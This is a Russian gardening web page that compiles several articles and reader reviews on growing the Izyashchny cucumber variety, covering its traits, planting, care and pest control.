0 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Характеристика огурцов сорта изящный

Характеристика огурцов сорта Изящный

Не все культуры подходят для выращивания в прохладном регионе, но сорт огурца Изящный станет хорошим выбором. Он был разработан в поселке ВНИИССОК, Московской области, спокойно себя чувствует в Сибири и на Дальнем Востоке. А садоводы отзываются о нем в основном положительно.

Характеристика огурцов сорта Изящный

Характеристика сорта

Огурец Изящный среднеспелый, урожай можно будет собрать уже через полтора-два месяца после высадки. Плетение среднее, может дать около 4-6 боковых побегов. Сорт подходит для открытого грунта и весенних теплиц, нуждается в насекомых-опылителях. Дает много мужских цветов и будет хорош в роли опылителя соседних растений.

Плоды вырастают размером 9-12 сантиметров и весом 130-150 грамм, со временем не желтеют. Кожура толстая, светло-зеленого цвета, на вкус не горчит. Мякоть не образует пустот, разве что после засолки. Урожайность сорта составляет 5-7 килограмм на квадратный метр.

Достоинства

Огурец Изящный наделен качественными характеристиками такого плана:

  • ранняя спелость;
  • хорош с виду и прекрасен на вкус;
  • устойчив к низким температурам и оливковой пятнистости, имеет среднюю устойчивость к бактериозу;
  • подходит для салатов, не горчит;
  • перезрев, не желтеет, а семена остаются мягкими;
  • легко переносит транспортировку;
  • невысокая стоимость семян.

Недостатки

  • много белобоких плодов, которые плохо смотрятся в консервации;
  • при мариновании появляются пустоты, иногда киснут;
  • плотная кожица не всем придется по вкусу;
  • относительно невысокая урожайность.

Далеко не лучшими характеристиками наделен огурец Изящный, чтобы применять его в засолке. Используйте для неё другие сорта, чтобы не разочаровывать себя. А «изящные» лучше съесть в свежем виде, кстати, они хорошо хранятся.

Выращивание семян

Выращивая рассадой, вы сможете раньше собрать урожай, а производительность культуры станет выше. Начните высеивать огурцы сорта Изящный в конце апреля, или начале марта. Для этого замочите семена в воде, по желанию добавьте стимулятор роста, а с первыми ростками поместите их в горшочки. Глубина посадки должна быть не более 2 сантиметров, место для рассады нужно выбирать теплое и солнечное. Застекленный балкон отлично подойдет для этих целей.

Но даже поставив рассаду в идеальное место, ей будет недостаточно света, а он ей нужен 16 часов в сутки. Поэтому, соорудите сверху поддерживающую конструкцию с люминесцентной лампой и освещайте огурцы, когда нет солнца. А чтобы защитить растения от вытягивания, её досвечивают со снижением температуры.

Огурцы, прошедшие процедуру закалки, легче приживаются после переезда. С этой целью их выносят на открытый воздух и оставляют на пару часов. При этом, их притеняют и защищают от сквозняков, агрессивное солнце и ветер могут навредить нежным росткам. Вы поймете, когда саженцы готовы к высадке по темно-зеленым листьям и коротким междоузлиям, стебли должны быть толстыми. А температура почвы прогреться до 15 градусов.

Подготовка почвы

От сорняков лучше сразу избавляться

Выбирая место под культуру, соблюдайте правила севооборота: садите их после картофеля, томата, лука или капусты. Или растений, которые специально заделывают в почву, давая земле «отдохнуть». А вот после тыквенных сажать воздержитесь, почва в таком случае будет недостаточно плодовита. К тому же у них общие вредители, успевшие за сезон хорошенько обосноваться в земле.

Для Изящного сорта хорошо подойдет рыхлый грунт, в котором преобладает гумус. Чтобы определить разновидность почвы на вашем участке, есть специальный тест. Возьмите немного земли и замесите её подобно тесту, а затем скатайте в колбаску.

Супесчаная почва сразу же развалится, а легкий суглинок пройдет тест. Если вы можете свернуть землю в колечко — это тяжелый суглинок. Тяжелую почву вы можете облегчить, если завезете на участок песка, его распределяют равномерно и перепахивают.

Осенью нужно добавить в почву свежий навоз. Перегнивая, он создает благотворную структуру, скрепляя слишком рыхлый и разрыхляя глинистый грунт. Хорошо удобрив грядку таким образом, минеральные удобрения, добавленные потом, раскроют себя значительно лучше.

Весной участок под огурцы нужно снова разрыхлить. Если вы не внесли навоз осенью, добавьте перегной и перекопайте землю на штык. Следите за состоянием грядки: от сорняков нужно сразу же избавляться. Примерно 20-25 мая добавьте минеральные удобрения, перекопайте грядку и разровняйте её граблями.

Правила посадки

Посадка этого овоща не создаст особых проблем даже неопытным огородникам.

Сроки

Когда почва прогреется до 15-18 градусов, рассаду можно перенести на открытый участок. И в то же время проследите, чтобы возвратные заморозки не угрожали вашей рассаде. Для гарантии, узнавайте погоду из нескольких источников.

Но метеорологические прогнозы не всегда бывают точны. Чтобы защитить огурцы от неожиданных морозов, вам нужно соорудить для них временное укрытие из металлических дуг и полиэтилена. Сделайте это сразу после высадки, а материалы лучше подготовить заблаговременно.

В конце мая-апреля выкопайте ямки размером с рассадный горшочек, их плотность не должна быть выше 3 растений на 1 квадратный метр. Аккуратно извлеките комок земли из горшочка и поместите в лунку. Постарайтесь не нарушать этот ком, огурцы плохо переносят пикирование и с поврежденной корневой системой начнут болеть.

Уплотните почву вокруг ростка и немного присыпьте землей, чтобы сохранить влагу, иначе может образоваться корка. Затем щедро полейте кустик теплой водой и соорудите временное укрытие от неожиданных морозов. Как только угроза ночных заморозков пройдет окончательно, снимите укрытие, чтобы растение в полной мере впитывало солнечный свет.

Уход за кустом

Характеристика столовых огурцов сорта Изящный утверждает, что вам не потребуется какой-то сложный уход за кустом. Как и все растения, он любит регулярные поливы теплой водой.

Используйте для этого бочку, в которой вода будет настаиваться на солнце. Также, можно совмещать поливы с подкормкой раз в десять дней, эти растения очень зависимы от питательных веществ и подкормка хорошо скажется на урожайности.

Формируя куст огурцов, можно сделать его намного эффективнее, а выращивание упростить в разы. Прищипывайте стебель над третьим листом, в результате у вас получится 5-6 побегов. И вдобавок, занимайтесь ежедневным сбором урожая, так соки растения будут уходить в рост и формировать новые завязи.

Обработка от вредителей

Описание изящного сорта огурцов, кроме сказанного, требует затронуть тему борьбы с вредителями. Если на вашей огуречной грядке поселилась бахчевая тля — сбродите 1 килограмм травы в 10 литрах воды на протяжении суток. Или приготовьте раствор: 200 грамм золы и 50 грамм тертого мыла в ведре воды. Затем обработайте насекомых с распылителя.

Тонкости выращивания, описание и характеристика огурцов сорта Изящный

Время на чтение: 7 минут

Ни один дачный участок не обходится без грядок с огурцами. Этот овощ занимает центральное место на огороде, поскольку он востребован не только в сезон, но и зимой в виде солений. Селекционеры годами трудятся над тем, чтобы получить максимально урожайный и вкусный сорт. Поэтому выращивание огурцов начинается с правильного выбора сорта, который будет отвечать всем требованиям дачника. Нередко предпочтение отдают виду огурца Изящный – беспроблемный овощ с высокими показателями.

История селекции сорта

Работы по выведению этого сорта начались еще в 60-х годах прошлого века под руководством О.В. Юрина. Официально же он был включен в Государственный реестр лишь в 1971 году. Спустя три года этот овощ был включен в Госреестр Беларуси. Для выведения сорта были взяты за основу холодостойкие огурцы, которые были получены еще в 30-х годах прошлого века. Изящный предназначается для выращивания практически во всех районах – от центрального до дальневосточного.

Описание и характеристики огурца Изящный

Сорт огурцов Изящный относится к раннеспелым видам, поэтому первые плоды начинают собирать спустя 40 дней после появления первых всходов. Эти овощи являются универсальными, благодаря чему их можно успешно выращивать как в отрытом грунте, так и в теплице. Изящный опыляется пчелами и производит большое количество цветков мужского типа.

Огуречный куст среднеплетистый, образует до семи боковых побегов. Длина плодов достигает 14 см, а масса – до 150 г. Зеленцы ровные, с белыми полосками, мелкими бугорками и светлой верхушкой. Мякоть огурцов сочная и хрустящая, горечь отсутствует. Урожайность средняя – до 7 кг с одного квадратного метра.

Основные положительные и отрицательные стороны

Как и любой другой сорт, Изящный обладает как преимуществами, так и недостатками. Востребованность этого сорта объясняется следующими положительными характеристиками:

  • обладают повышенной холодостойкостью, поэтому сорт используют для ранних посевов и выращивания в северных районах с коротким летом;
  • отличается повышенной устойчивостью к грибковым болезням и вредителям;
  • имеет хороший товарный вид, со временем не желтеет;
  • обладает устойчивым иммунитетом;
  • подходит для выращивания в парниках и теплицах;
  • неприхотлив к условиям выращивания;
  • плоды рано созревают;
  • является катализатором перекрестного опыления;
  • небольшая стоимость семян.

Стоит также отметить и отрицательные стороны, которые присущи огурцам сорта Изящный. Плоды отличаются грубой кожурой, которая слишком заметна при употреблении в свежем виде. Кроме этого, сорт не дает высокую урожайную отдачу.

Нюансы выращивания сорта

Подготовка участка и посадочного материала не отличается строгими требованиями. Сорт Изящный можно высаживать двумя способами: в открытом грунте или через рассаду.

Подготовка посадочного материала

Посевной материал необходимо подвергнуть тщательной обработке. Для начала семена калибруют: замачивают в слабом растворе марганцовки, а спустя 15 минут выдерживают в теплой чистой воде. Полноценные семена, которые можно использовать для посадки, должны утонуть. Экземпляры, которые всплыли, убираются. Далее семена помещают в ткань и слегка прогревают. После такой подготовки посадочный материал можно высеивать в грунт или предварительно прорастить.

Если выбран второй вариант, то семена следует замочить в стимуляторе роста на несколько минут, а затем поместить во влажную ткань или продержать один день в мокрых опилках. Для выращивания рассады каждую семечку высаживают в отдельную емкость и дожидаются появления первых четырех листочков. Также рекомендуется периодически добавлять специальные удобрения, а перед высадкой закалять рассаду, чтобы ускорить укоренение. Рассада будет готова к посадке на 25 сутки.

Подбор местности на посадку

Сорт Изящный требователен к большому количеству света и влажному грунту. Поэтому местность следует выбирать незатемненную. Важно избегать низин, где может скапливаться холод. Наиболее благоприятным участком станет суглинистая почва с нейтральной кислотностью. Участок для посадки огурцов следует готовить заранее, удобрив его осенью гумусом или навозом. Для повышения питательности грунта следует добавить минеральные удобрения, а затем все перекопать. Органические вещества закладывают на глубину в 15 см.

Процесс посадки в открытый грунт

Высадку посадочного материала в открытый грунт начинают только тогда, когда температура почвы достигает отметки в 15 градусов. Семена размещают на глубину 2 см. Почву для посева начинают подготавливать еще с осени, поскольку земля должна быть рыхлой и содержать большое количество гумуса. За несколько дней до начала огородных работ стоит послойно засыпать опилки, торф, солому, навоз или золу. После высадки почву требуется поддерживать во влажном состоянии, проводя ежедневный полив.

Чтобы избавить грунт от болезнетворных микроорганизмов, рекомендуется залить его горячей водой (60 градусов) и только потом высаживать огурцы. Рассаду высаживают таким образом:

  1. Выкопать лунки и высадить саженцы так, чтобы на 1 кв.м было размещено не более трех растений.
  2. Расстояние между лунками должно быть 40 см, между рядами – до 100.
  3. Вертикальная посадка сопровождается установкой опор.
  4. Посадочный материал размещают на глубину до 10 см.
  5. Почву вокруг саженцев присыпают землей, а затем поливают теплой водой.
  6. Сразу после высадки растениям делают укрытие, чтобы избежать переохлаждения в случае ночных заморозков.

Особенности выращивания в теплице

Под укрытием огурцы высаживают на месяц раньше, а почву заранее обрабатывают марганцовкой. Растение опыляется насекомыми, но в том случае, если их недостаточно, это делается вручную. Для привлечения плеч и шмелей, огуречные кусты опрыскивают сладким сиропом, приготовленным из сахара или меда. Формовку куста проводят несколько позже – когда огурцы достигают конца шпагата. Крайне важно следить за тем, чтобы в теплице не было сквозняков.

Тонкости ухода за огурцами

Агротехнические мероприятия и уход за сортом Изящный – это стандартные процедуры, которые не требуют особых навыков и знаний.

Полив и подкормка

Растения поливают два раза в неделю исключительно теплой водой, предварительно взрыхлив верхний слой почвы. Во время жаркой погоды частоту полива увеличивают и проводят его каждый день. Важно следить, чтобы вода не попадала на листья огуречного куста. Спустя две недели после высадки требуется ввести первую подкормку.

Все секреты выращивания огурца сорта Изящный

Доброго дня, уважаемые дачники! Не знаю как вы, но я всегда восторгаюсь старыми и проверенными сортами огурцов, которые успешно выдерживают конкуренцию с новинками селекции. И вот сегодня предлагаю вам описание сорта Изящный – одного из моих любимых огурцов, который культивируется с 70-х годов прошлого столетия. И судя по отзывам тех, кто его сажал, многие огородники тоже не собираются от него отказываться.

Галантный «красавец» на вашем участке: характеристика сорта

Зеленцы сорта имеют красивую выровненную форму, яркую изумрудную окраску и полностью оправдывают свое название. Но не только за красоту плодов ценят этот сорт.

Огурчик Изящный неприхотлив, что для многих дачников является очень важным качеством. Он отличается холодостойкостью, отлично адаптируется к условиям выращивания, дает неплохие урожаи и в открытом грунте, и в теплицах.

Он входит в группу раннеспелых сортов, и первые зеленцы собирают уже через 44-48 дней после появления ростков. В условиях регионов рискованного земледелия сроки созревания увеличиваются (до 55-60 дней), что объясняется более суровым климатом. Благодаря своей стойкости к перепадам температур, к возможным понижениям температуры сорт снискал популярность у многих дачников.

НА ЗАМЕТКУ! Многие сорта, выведенные в одно время с огурцами сорта Изящный, уже устарели и больше не возделываются. А этот сорт вполне успешен и известен

Кусты этого сорта имеют средние размеры, образуют до 5-7 боковых побегов. Сорт нуждается в опылении пчелами, при этом благодаря тому, что на растении формируется множество мужских цветков, именно его часто подсаживают в качестве сорта-опылителя.

Плоды формой в виде эллипса, достигают массы до 120-150 граммов. Зеленцы вырастают до 10-12 см, для засолки и консервации рекомендуется снимать плоды длиной 6-8 см. Кожица плотная, есть белесые полосы, а также небольшая бугорчатость. Шипы белые, небольшие и неколючие (сморите фото).

Огуречная мякоть очень плотная, нет пустот, семена мелкие. Вкусовые качества очень хорошие, горечь отсутствует.

НА ЗАМЕТКУ! При нерегулярном сборе зеленцы могут перезревать.

Такие огурчики будут хороши везде: в летних салатах, в консервации, в засолке. Соленые зеленцы Изящного имеют превосходный вкус, обладают хрустом, словом – это настоящий русский деликатес.

«Плюсы» и «минусы» сорта огурчиков Изящный

Бесспорно, по урожайности этот сорт трудно сравнить с современными гибридами. С одного квадратного метра грядки собирают не более 7 кг зеленцов, и для кого-то это может показаться не совсем впечатляющим результатом. Также некоторые огурцы могут иметь белые пятна (особенно при нерегулярной уборке урожая), и из-за этого при засолке выглядеть не очень презентабельно. Вот, пожалуй, и все «минусы» сорта.

Каковы преимущества и за что огурец Изящный ценят очень многие огородники? Перечисляем:

  • очень вкусные зеленцы, с ярко выраженным ароматом;
  • высокая устойчивость к неблагоприятным условиям выращивания;
  • стойкость к болезням;
  • универсальность использования плодов.

Для многих огородников (в силу небольших площадей участков) важным качеством является возможность использовать огурцы не только в салаты, но и заготовки. Сорт Изящный для этого подходит отлично. Кроме того, некоторые дачники считают, что вкус пчелоопыляемых сортов гораздо лучше, чем у партенокарпиков гибридов. И в этом случае огурец Изящный отвечает всем требованиям.

Особенности выращивания огурчика Изящный

В южных регионах сорт Изящный отлично плодоносит на грядах под открытым небом (сеют семена сразу в грунт), в средней полосе и севернее его выращивают в теплицах (через рассаду).

Посев обычно проводят в конце апреля или в первых числах мая. Сроки диктуются климатическими особенностями региона, так как огурчики не переносят холодов и высадка на постоянное место может быть только, когда уйдет угроза заморозков.

Рассада должна иметь возраст 22-25 дней, к этому времени у растений обычно уже сформировано до 4 настоящих листочков.

Рассаду выращивают в отдельных емкостях (торфяные горшочки, стаканы), что позволяет затем пересадить огурцы прямо с комом земли.

НА ЗАМЕТКУ! Обязательно перед посевом семена обеззараживают раствором марганцовки, замачивают в стимуляторе роста, а затем проращивают во влажной ткани.

Огуречная рассада нуждается в аккуратных и регулярных поливах, подкормке (достаточно будет дважды подкормить растения), рыхлении почвы.

Высадку огурчиков проводят в лунки, схема посадки: на один квадратный метр – три кустика Изящного. При выращивании сорта в открытом грунте хороший эффект дает обустройство «теплых» гряд (в траншею закапывают любую органику). Также заранее устанавливают шпалеры, чтобы потом растения могли иметь надежную опору.

Уход сводится к регулярным поливам, подкормкам, контроле состояния растений.

Поливы

Огурцы сорта Изящный, как и его «собратья» очень любят влагу, но при этом не переносят ее избытка. Неправильные поливы могут привести к возникновению болезней, а затем и к гибели растений.

Потому важно запомнить несложные правила:

  • поливают огурчики только под корень (лучше в специальные бороздки);
  • график поливов рассчитывают исходя из погодных условий (раз в 2-3 дня в солнечные дни, раз в 5-6 дней в пасмурную погоду);
  • в фазе цветения и начала плодоношения норму поливов увеличивают;
  • не допускают попадания большого количества влаги на листья растений, цветы и завязи.

Подкормки

Даже неопытные огородники отлично знают, что без подкормок сложно получить высокие урожаи огурцов. Лучший вариант – чередование минеральных удобрений и органики, при этом обязательно соблюдают нормы.

В начале вегетации обычно вносят азотные удобрения, в фазу бутонизации, завязывания зеленцов приоритет отдают фосфорным и калийным подкормкам. Из органики подойдут:

  1. разведенный в воде коровяк, помет птиц;
  2. древесная зола.

В продаже представлено множество различных составов (Master, Агрикола), рекомендованных для подкормки огурцов, так что можно использовать их.

Опыление

Этот сорт является пчелоопыляемым огурчиком, и очень важно привлечь на грядку (или в теплицы) насекомых. Для этого можно использовать опрыскивание растений сахарным сиропом, на аромат которого охотно летят пчелы и шмели.

Также хороший эффект дает посадка рядом с огурцами растений-медоносов: шалфея, подсолнухов, календулы, розмарина, циннии.

Также не забывают проводить профилактические мероприятия против болезней, вредителей огурцов. Соблюдения основных правил агротехники убережет растения, а сорт Изящный порадует очень неплохим урожаем.

Огурец «Изящный»: описание сорта, фото и отзывы

Сорт огурцов «Изящный» по праву входит в «золотой фонд» советского овощеводства. Работы по его выведению велись под руководством О. В. Юриной специалистами Всесоюзного научно-исследовательского института селекции и семеноводства овощных культур (сегодня – ФГБНУ «Федеральный научный центр овощеводства», пос. ВНИИССОК, Московская обл.). Официально сорт был зарегистрирован в Госреестрах России (в 1971 году) и Беларуси (в 1974 году).

Сорт «Изящный» продолжил линию холодостойких огурцов, таких как «Вязниковский 37» и «Муромский 36», которые были разработаны еще в 30-е годы прошлого века и легли в основу дальнейшего развития отечественной селекции. Эти сорта районированы и хорошо приспособлены к климатическим условиям большинства регионов России, включая зоны рискованного земледелия. Выносливость к холодам и скороспелость позволяют проводить раннюю посадку и собирать стабильный урожай в условиях короткого лета. Низкая температура почвы в первое время после посадки способствует развитию мощной корневой системы и замедляет рост надземной части растения. Это положительно сказывается в дальнейшем на скороспелости, урожайности, выносливости и неподверженности заболеваниям. «Изящный» обладает всеми перечисленными достоинствами, включая высокую устойчивость к оливковой пятнистости (кладоспориозу) и толерантность к бактериозу.

О современных селекционных программах и достижениях специалистов ФГБНУ «Федеральный научный центр овощеводства» можно узнать из следующего видеосюжета:

Сорт рекомендован к выращиванию на открытом грунте и под пленочными укрытиями (в весенних теплицах) Северо-Западного, Центрального, Волго-Вятского, Средневолжского, Уральского, Западно- и Восточно-Сибирского, Дальневосточного регионов.

Благодаря высокой урожайности сорт входит в число овощных культур, предназначенных для личного и товарного производства, пользуется заслуженной популярностью у огородников-любителей и профессиональных фермеров.

Основные характеристики

Рассматривая достоинства сорта, в первую очередь следует выделить:

Отличные вкусовые качества зеленцов в первую очередь салатного назначения, а также пригодных для всех видов переработки

Характеристика Показатели
Сроки созревания Раннеспелый: плодоношение начинается через 40-45 дней после появления полных всходов
Урожайность До 5-7 кг/м 2 товарных плодов в открытом грунте
Универсальность назначения
Устойчивость к болезням Устойчив к оливковой пятнистости (кладоспориозу), толерантен к бактериозу

Описание сорта

Сорт относится к категории пчелоопыляемых: для развития завязей в женских цветках требуется их оплодотворение пыльцой мужских. Процесс перекрестного опыления зависит от количества и активности насекомых.

Растение индетерминантное (неограниченное в росте), но среднерослое и умеренно ветвистое. Имеет смешанный тип цветения, при этом в листовых пазухах центрального стебля располагаются преимущественно мужские цветки, а женские с завязями появляются уже на боковых побегах первого порядка. Для повышения урожайности раньше рекомендовалось прищипывать точку роста на верхушке главного (центрального) стебля после 3-го настоящего листа либо после 6-8-го, если ветвление запаздывало. Считается, что на правильно сформированном кусте должно быть 5-6 боковых побегов.

Прищипывание центрального стебля более актуально для позднеспелых сортов, у которых необходимо стимулировать ветвление.

Сейчас многие огородники придерживаются мнения, что пчелоопыляемые огурцы лучше вообще не тревожить пасынкованием. При естественном росте куста на центральном стебле остается достаточное для опыления количество пустоцветов, а на боковых побегах закладывается основной урожай. С советами опытного овощевода по формированию огурцов на шпалере в открытом грунте вы можете ознакомиться, посмотрев видео, размещенное в конце статьи.

Плодоношение огурца «Изящный» (в зависимости от климатических и погодных условий, агротехники выращивания) начинается с 40-60 дня после появления полных всходов. Зеленцы длиной 9-13 см, массой в среднем 100-140 г, имеют выровненную эллипсовидную форму, слабую ребристость и светло-зеленую окраску с короткими белесыми полосами. Кожура средней плотности, покрыта мелкими бугорками и белым опушением. Зеленцы обладают красивым товарным видом (не склонны к перерастанию и пожелтению) и высокими вкусовыми качествами: мякоть без пустот, сочная и хрустящая, горечь отсутствует. Сорт заявлен как салатный, но, по мнению большинства огородников, пригоден для засолки и консервирования.

В числе недостатков зеленцов данного сорта иногда указывают:

  • неравномерность окраски – наличие на плодах белых пятен (белобокие);
  • образование внутренних пустот при термической обработке в процессе маринования;
  • перекисание и размягчение при засоле.

Товарная урожайность в открытом грунте довольно высокая – до 7 кг/м 2 . Сбор зеленцов следует проводить ежедневно или через день, чтобы не допускать перезревания плодов и направлять силы растения на заложение и налив новых завязей.

Как и у других пчелоопыляемых сортов, в огурцах данного сорта, оставленных на плетях до естественного вызревания, образуются полноценные семена. Их можно использовать для дальнейшего выращивания, так как сортовые признаки устойчиво закреплены на генетическом уровне. Семенной материал собственного производства советуют высаживать не на следующий, а на 2-3-й год после сбора.

Покупные семена сорта огурца «Изящный» по ценам вполне доступны, их выпуском занимаются многие агрофирмы. Как проверяется их качество, вы можете посмотреть в следующем видео:

Преимущество коммерческого семенного материала в том, что он проходит обработку и не требует дополнительной домашней подготовки. Такие семена огурцов сажают на рассаду или прямым посевом в почву прямо из упаковки, без предварительного проращивания, замачивания, обеззараживания и закаливания.

Сорт огурцов «Изящный», по отзывам большинства огородников, неприхотлив в уходе, вынослив, способен активно и длительно плодоносить при неблагоприятных погодных условиях, устойчив к холоду и болезням.

Отзывы

Тамара, 54 года, г. Дивногорск

Сорт огурцов Изящный – в числе проверенных и надежных огурцов-старожилов, которые мы высаживаем каждый год. Лето у нас в Красноярском крае недолгое, а этот сорт созревает быстро и успевает дать нам хороший урожай вкусных огурчиков. Они пчелоопыляемые, а значит натуральные и полезные, всегда сладкие и сочные, без горечи. Отлично хрустят и восхитительно пахнут. Мы их едим свежими прямо с грядки, режем во все летние салаты. Сорванные огурцы хорошо хранятся в холодильнике, не желтеют. На консервацию я этот сорт не беру, больше люблю черношипые.

Кристина, 37 лет, республика Башкортостан

Мы от выращивания старых сортов огурцов, например Изящного, решили отказаться. За последнее время появилось много гораздо более урожайных и устойчивых, а с ним мы два года подряд остались без урожая. То мозаикой его побило, то тлей, а потом вообще все кусты погибли от ложной мучнистой росы. Вроде бы обрабатывали и опрыскивали, а огурцов даже не поели.

Михаил, 42 года, г. Бобруйск

С огурцами «Изящный» знаком уже очень давно и перепробовал разные рекомендации по его выращиванию. Пускал плети в расстил горизонтально и натягивал для них шпалеру, чтобы тянулись вверх. Самый лучший результат мне дал такой способ формирования: центральный побег я прищипнул после 3-4 листа, два нижних боковых опустил на землю и в местах сгиба, не закрывая точку роста, прикопал, чтобы они укоренились. Получилось, что куст пошел в 3 стебля – на центральном были в основном пустоцветы для опыления, а на мощных боковых начали активно вязаться огурчики. Пасынки второго порядка я прищипывал после 2-3 листьев. Урожай собирали все лето впечатляющий! Мы эти огурцы и ели, и солили, и мариновали. Во всех видах они хороши!

Аглая, 58 лет, Ярославская обл.

Этот огурец полностью оправдывает свое название. Кусты не огромные, а сами огурчики красивые и не толстые. Даже если просмотришь огурец на плети, и он перерастет, все равно остается вкусным, цвет сохраняет зеленый, кожура и семена долго не огрубевают. У меня не получается уделять огороду много внимания, но Изящный настолько неприхотливый и выносливый, что плодоносит несмотря ни на какую погоду. Благодарно откликается на подкормки разведенным в воде навозом и травяными настоями. Спокойно обходится без пасынкования и сооружения разных опор. Растет у нас в открытом грунте. Семена высаживаем свои из года в год. По вкусу огурцы очень приятные – сладковатые, сочные, крепкие. Кожица тонкая и неколючая, можно сорвать и сразу съесть с удовольствием.

Владимир, 47 лет, Московская обл.

По моему мнению, такие сорта как этот уже морально устарели. Огурец сам по себе неплохой. Но по большинству характеристик во многом уступает более современным сортам и гибридам. Вкусовые качества – на уровне и семена дешевые, хорошо справляется с нашими перепадами температур и неблагоприятными погодными условиями. Пожалуй, это его главные достоинства. Больше подойдет для начинающих огородников, которые не хотят возиться с формированием и уходом.

Видео

Практические рекомендации от профессионального агронома по формированию пчелоопыляемых растений огурцов в открытом грунте смотрите далее:

Несколько лет работала в качестве редактора телевизионной программы с ведущими производителями декоративных растений в Украине. На даче из всех видов аграрных работ предпочитает сбор урожая, но ради этого готова регулярно полоть, тяпать, пасынковать, поливать, подвязывать, прореживать и т. д. Убеждена, что самые вкусные овощи и фрукты – выращенные своими руками!

Нашли ошибку? Выделите текст мышкой и нажмите:

Фермер из Оклахомы Карл Бернс вывел необычный сорт разноцветной кукурузы, получивший название Rainbow Corn («радужная»). Зерна на каждом початке – разных цветов и оттенков: коричневые, розовые, фиолетовые, голубые, зеленые и др. Такого результата удалось добиться путем многолетнего отбора наиболее окрашенных обычных сортов и их скрещивания.

Один из самых удобных методов заготовить выращенный урожай овощей, фруктов и ягод – заморозка. Некоторые полагают, что замораживание приводит к потере питательных и полезных свойств растительных продуктов. В результате проведенных исследований ученые выяснили, что снижение пищевой ценности при заморозке практически отсутствует.

Никакой природной защиты у томатов от фитофтороза нет. Если фитофтора нападает, гибнут любые помидоры (и картошка тоже), что бы ни было сказано в описании сортов («сорта, устойчивые к фитофторозу» – лишь маркетинговый ход).

«Морозостойкие» сорта садовой земляники (чаще просто – «клубника») так же нуждаются в укрытии, как и обычные сорта (особенно в тех регионах, где бывают бесснежные зимы или морозы, чередующиеся с оттепелями). У всей земляники корни поверхностные. Это означает, что без укрытия они вымерзают. Уверения продавцов в том, что земляника «морозостойкая», «зимостойкая», «переносит морозы до −35 ℃» и т. д. – обман. Садоводы должны помнить о том, что корневую систему земляники еще никому не удавалось изменить.

Считается, что некоторые овощи и фрукты (огурцы, стеблевой сельдерей, все разновидности капусты, перец, яблоки) обладают «отрицательной калорийностью», то есть при переваривании затрачивается больше калорий, чем в них содержится. На самом деле в пищеварительном процессе расходуется только 10-20% калорий, полученных с едой.

Компост – перепревшие органические остатки самого разного происхождения. Как сделать? В кучу, яму или большой ящик складывают все подряд: кухонные остатки, ботву огородных культур, скошенные до цветения сорняки, тонкие веточки. Все это переслаивают фосфоритной мукой, иногда соломой, землей или торфом. (Некоторые дачники добавляют специальные ускорители компостирования.) Накрывают пленкой. В процессе перепревания кучу периодически ворошат или протыкают для притока свежего воздуха. Обычно компост «зреет» 2 года, но с современными добавками может быть готов и за один летний сезон.

От сортовых помидоров можно получить «свои» семена для посева на следующий год (если сорт очень понравился). А с гибридными это делать бесполезно: семена-то получатся, но они будут нести наследственный материал не того растения, с которого взяты, а его многочисленных «предков».

Собирать лекарственные цветы и соцветия нужно в самом начале периода цветения, когда содержание полезных веществ в них максимально высокое. Цветки положено рвать руками, обрывая грубые цветоножки. Сушат собранные цветы и травы, рассыпав тонким слоем, в прохладном помещении при естественной температуре без доступа прямого солнечного света.

Новинка американских разработчиков – робот Tertill, выполняющий прополку сорняков в огороде. Прибор придуман под руководством Джона Доунза (создателя робота-пылесоса) и работает при любых погодных условиях автономно, передвигаясь по неровной поверхности на колесах. При этом он срезает все растения ниже 3 см встроенным триммером.

Огурец Изящный

Огурчики – самая важная часть летне-осенних заготовок для любой хозяйки. А выстроившиеся длинными рядами банки с разнообразными видами закруток из огурцов – поистине символ русского хлебосольства. Наверное, поэтому так важно, несмотря на обилие предлагаемых в настоящее время сортов и гибридов огурцов, выбрать для себя тот, который захочется сажать еще и еще, и не беспокоиться о проблемах с его выращиванием, а лишь собирать все новые и вкусные рецепты заготовок из огурцов. Огурец Изящный по многим своим характеристикам является именно таким беспроблемным сортом.

Описание и характеристики

Сорт огурцов Изящный уже очень давно выращивается огородниками на своих приусадебных участках и до сих пор не потерял своей значимости, несмотря на изобилие новых, появляющихся каждый год, сортов и гибридов. А это кое-что да значит! Выведен он был еще в далекие 60-е годы во ВНИИССОК селекционером О.В. Юриной. В 1971 году был включен в госреестр России для использования практически во всех регионах России от центральных районов до Дальнего Востока. Описание сорта огурцов Изящный включает следующие характеристики:

  • Сорт Изящный относится к раннеспелым, что означает, что первые огурцы можно начинать собирать уже через 38-40 дней после того, как появились всходы;
  • Сорт универсальный по условиям выращивания – значит, что он одинаково хорошо будет расти как в открытом грунте, так и в теплицах. Но особенностью огурцов этого сорта является повышенная холодостойкость, поэтому его можно использовать как для ранних посевов, так и для выращивания в открытом грунте в северных районах в условиях короткого лета;
  • Сорт огурцов Изящный является пчелоопыляемым и при этом производит большое количество мужских цветков. Сорт может служить превосходным опылителем для других сортов, например, преимущественно женского типа цветения;
  • Растения огурца сорта Изящный среднеплетистые, образуют от 5 до 7 боковых побегов;
  • Сорт отличается также повышенной устойчивостью к болезням: бактериозу, мучнистой росе и оливковой пятнистости.

Характеристики плодов

Сами огурцы сорта Изящный имеют эллипсовидную вытянутую форму, сочно-зеленого цвета. Длина зеленцов от 8 до 14 см, масса от 120 до 150 грамм. Огурцы обычно выровненные, с мелкими бугорками и белым опушением. Кожура тонкая с белыми полосками и светлой верхушкой. Мякоть огурцов хрустящая, сочная, без горечи. Вкусовые качества высокие. Назначение сорта универсальное – применяется как для салатов, так и для засолки и консервирования. Товарная урожайность не очень высокая – около 5 -7 кг с одного квадратного метра.

Достоинства и недостатки

У сорта огурцов Изящный имеются следующие преимущества: неприхотливость к условиям выращивания, раннее созревание плодов, высокие вкусовые качества, холодостойкость, небольшая стоимость семян, даже при перезревании плодов у них семена остаются нежными, огурцы не желтеют.

Существуют у сорта огурцов Изящный и недостатки: сравнительно небольшая урожайность, особенно по сравнению с новейшими гибридами, большое число плодов с белыми бочками, которые не очень красиво могут смотреться в заготовках, по некоторым отзывам происходит загрубение кожицы при перезревании, другие же источники отвергают этот недостаток.

Особенности посадки

Огурцы сорта Изящный можно садить двумя способами: сеять непосредственно в грунт или выращивать через рассаду.

На рассаду семена огурцов сеются в конце апреля или в начале мая.

Затем семена сажаются по одному семечку в каждую отдельную емкость, поскольку огурцы очень не любят, чтобы тревожили их корни при пересадке. При появлении примерно 4-х листьев, возраст рассады к этому времени будет около 25 дней, ее высаживают в грунт, стараясь не разрушить при высадке земляного кома. Рассаду огурца сорта Изящный сажают с таким расчетом, чтобы на один квадратный метр приходилось не более трех растений.

